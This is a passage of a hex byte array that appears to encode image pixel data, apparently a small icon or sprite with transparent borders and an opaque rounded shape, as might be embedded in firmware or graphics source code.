0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa0, 0xff, 0x00, 0x40, 0xff, 0x63, 0x60, 0xff, 0x38, 0x60, 0xff, 0x1b, 0x00, 0xff, 0x27, 0xc0, 0xfe, 0xf3, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xef, 0x40, 0xfe, 0x00, 0x61, 0xff, 0x1f, 0x60, 0xff, 0x43, 0x40, 0xff, 0x30, 0x60, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe0, 0xfe, 0x00, 0xe0, 0xfe, 0x8b, 0xe0, 0xfe, 0xff, 0x20, 0xff, 0xec, 0x40, 0xff, 0xdc, 0xe0, 0xfe, 0xfb, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0xe1, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xf8, 0x41, 0xff, 0xd7, 0x00, 0xff, 0xf0, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0x30, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 0x20, 0xff, 0x00, 0x20, 0xff, 0x2c, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0xe1, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xe7, 0xe0, 0xfe, 0x14, 0x40, 0xff, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x10, 0x60, 0xff, 0x1c, 0xe0, 0xfe, 0x00, 0x20, 0xff, 0x00, 0xc0, 0xfe, 0xf0, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0xe1, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xc7, 0x40, 0xff, 0x00, 0xa3, 0xff, 0x00, 0x60, 0xff, 0x1c, 0x60, 0xff, 0x0f, 0x60, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0xff, 0x00, 0x40, 0xff, 0x3c, 0x20, 0xff, 0xff, 0x40, 0xff, 0xff, 0x40, 0xff, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0xe1, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0x40, 0xff, 0xff, 0x20, 0xff, 0xff, 0x20, 0xff, 0xff, 0x60, 0xff, 0x18, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0xff, 0x00, 0x20, 0xff, 0x03, 0xc0, 0xfe, 0xd3, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0x84, 0xe0, 0xfe, 0x00, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xff, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 0x20, 0xff, 0x00, 0xe0, 0xfe, 0x47, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0xe1, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xef, 0xa0, 0xfe, 0x14, 0x60, 0xff, 0x00, 0x40, 0xff, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xff, 0x00, 0x60, 0xff, 0x37, 0x60, 0xff, 0x70, 0x60, 0xff, 0xa7, 0x61, 0xff, 0xc7, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0xe1, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xf7, 0x61, 0xff, 0xc4, 0x60, 0xff, 0x97, 0x60, 0xff, 0x6b, 0x60, 0xff, 0x2b, 0x60, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0xff, 0x00, 0x20, 0xff, 0x2f, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x41, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x22, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0x00, 0xff, 0xf7, 0x60, 0xff, 0x0c, 0x20, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0xff, 0x00, 0xe0, 0xfe, 0x00, 0xc0, 0xfe, 0x64, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x03, 0xff, 0xff, 0x23, 0xff, 0xff, 0x23, 0xff, 0xff, 0x23, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x43, 0xff, 0xff, 0x44, 0xff, 0xff, 0x26, 0xff, 0xff, 0x26, 0xff, 0xff, 0x25, 0xff, 0xff, 0x23, 0xff, 0xff, 0x02, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0xe1, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xf7, 0xc0, 0xfe, 0x30, 0xe0, 0xfe, 0x00, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe0, 0xfe, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 0x00, 0xfe, 0x00, 0xc0, 0xfe, 0xb7, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x05, 0xff, 0xff, 0x29, 0xf7, 0xff, 0x29, 0xf7, 0xff, 0x27, 0xf7, 0xff, 0x45, 0xff, 0xff, 0x44, 0xff, 0xff, 0x43, 0xff, 0xff, 0x42, 0xff, 0xff, 0x62, 0xff, 0xff, 0x62, 0xff, 0xff, 0x62, 0xff, 0xff, 0x62, 0xff, 0xff, 0x62, 0xff, 0xff, 0x42, 0xff, 0xff, 0x45, 0xff, 0xff, 0x29, 0xf7, 0xff, 0x29, 0xf7, 0xff, 0x28, 0xf7, 0xff, 0x06, 0xff, 0xff, 0x05, 0xff, 0xff, 0x04, 0xff, 0xff, 0x03, 0xff, 0xff, 0x02, 0xff, 0xff, 0xe1, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0x9f, 0x61, 0xfe, 0x00, 0x60, 0xff, 0x00, 0x40, 0xff, 0x00, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0xff, 0x00, 0x60, 0xff, 0x23, 0x60, 0xff, 0x88, 0x40, 0xff, 0xd7, 0xe0, 0xfe, 0xf3, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0x01, 0xff, 0xff, 0x02, 0xff, 0xff, 0x02, 0xff, 0xff, 0x02, 0xff, 0xff, 0x21, 0xff, 0xff, 0x26, 0xff, 0xff, 0x2b, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x2f, 0xf7, 0xff, 0x2c, 0xf7, 0xff, 0x28, 0xf7, 0xff, 0x46, 0xff, 0xff, 0x44, 0xff, 0xff, 0x64, 0xff, 0xff, 0x63, 0xff, 0xff, 0x63, 0xff, 0xff, 0x62, 0xff, 0xff, 0x62, 0xff, 0xff, 0x61, 0xff, 0xff, 0x43, 0xff, 0xff, 0x27, 0xf7, 0xff, 0x2b, 0xf7, 0xff, 0x2c, 0xf7, 0xff, 0x0b, 0xf7, 0xff, 0x09, 0xf7, 0xff, 0x08, 0xf7, 0xff, 0x07, 0xf7, 0xff, 0x05, 0xff, 0xff, 0xe3, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0x00, 0xff, 0xef, 0x40, 0xff, 0xd3, 0x60, 0xff, 0x74, 0x40, 0xff, 0x0f, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0xff, 0x04, 0x20, 0xff, 0xa0, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0x00, 0xff, 0xff, 0x04, 0xff, 0xff, 0x04, 0xff, 0xff, 0x04, 0xff, 0xff, 0x25, 0xff, 0xff, 0x09, 0xf7, 0xff, 0x2d, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x31, 0xf7, 0xff, 0x31, 0xf7, 0xff, 0x2f, 0xf7, 0xff, 0x2d, 0xf7, 0xff, 0x4a, 0xf7, 0xff, 0x47, 0xf7, 0xff, 0x65, 0xff, 0xff, 0x64, 0xff, 0xff, 0x64, 0xff, 0xff, 0x64, 0xff, 0xff, 0x45, 0xff, 0xff, 0x48, 0xf7, 0xff, 0x29, 0xf7, 0xff, 0x2b, 0xf7, 0xff, 0x2e, 0xf7, 0xff, 0x2e, 0xf7, 0xff, 0x2e, 0xf7, 0xff, 0x0e, 0xf7, 0xff, 0x0c, 0xf7, 0xff, 0x09, 0xf7, 0xff, 0xe4, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0x40, 0xff, 0x63, 0x60, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xff, 0x00, 0x00, 0xff, 0x00, 0xc0, 0xfe, 0x54, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0x00, 0xff, 0xff, 0x08, 0xf7, 0xff, 0x07, 0xf7, 0xff, 0x06, 0xff, 0xff, 0x08, 0xf7, 0xff, 0x2e, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x54, 0xf7, 0xff, 0x53, 0xf7, 0xff, 0x52, 0xf7, 0xff, 0x51, 0xf7, 0xff, 0x51, 0xf7, 0xff, 0x4f, 0xf7, 0xff, 0x4d, 0xf7, 0xff, 0x4a, 0xf7, 0xff, 0x47, 0xf7, 0xff, 0x65, 0xff, 0xff, 0x64, 0xff, 0xff, 0x45, 0xff, 0xff, 0x49, 0xf7, 0xff, 0x2c, 0xf7, 0xff, 0x2d, 0xf7, 0xff, 0x2e, 0xf7, 0xff, 0x2f, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x10, 0xf7, 0xff, 0x0b, 0xf7, 0xff, 0x05, 0xff, 0xff, 0x00, 0xff, 0xff, 0xe1, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0x33, 0x80, 0xff, 0x00, 0x60, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5f, 0xb6, 0x00, 0x7f, 0xc6, 0x00, 0xe0, 0xfe, 0x00, 0xe1, 0xfe, 0x80, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0x00, 0xff, 0xff, 0x0b, 0xf7, 0xff, 0x0b, 0xf7, 0xff, 0x0a, 0xf7, 0xff, 0x0a, 0xf7, 0xff, 0x2f, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x78, 0xf7, 0xff, 0x77, 0xf7, 0xff, 0x55, 0xf7, 0xff, 0x54, 0xf7, 0xff, 0x52, 0xf7, 0xff, 0x51, 0xf7, 0xff, 0x50, 0xf7, 0xff, 0x50, 0xf7, 0xff, 0x4e, 0xf7, 0xff, 0x4a, 0xf7, 0xff, 0x47, 0xf7, 0xff, 0x46, 0xff, 0xff, 0x48, 0xf7, 0xff, 0x2c, 0xf7, 0xff, 0x2f, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x30, 0xf7, 0xff, 0x31, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x0d, 0xf7, 0xff, 0x06, 0xff, 0xff, 0xe1, 0xfe, 0xff, 0xe1, 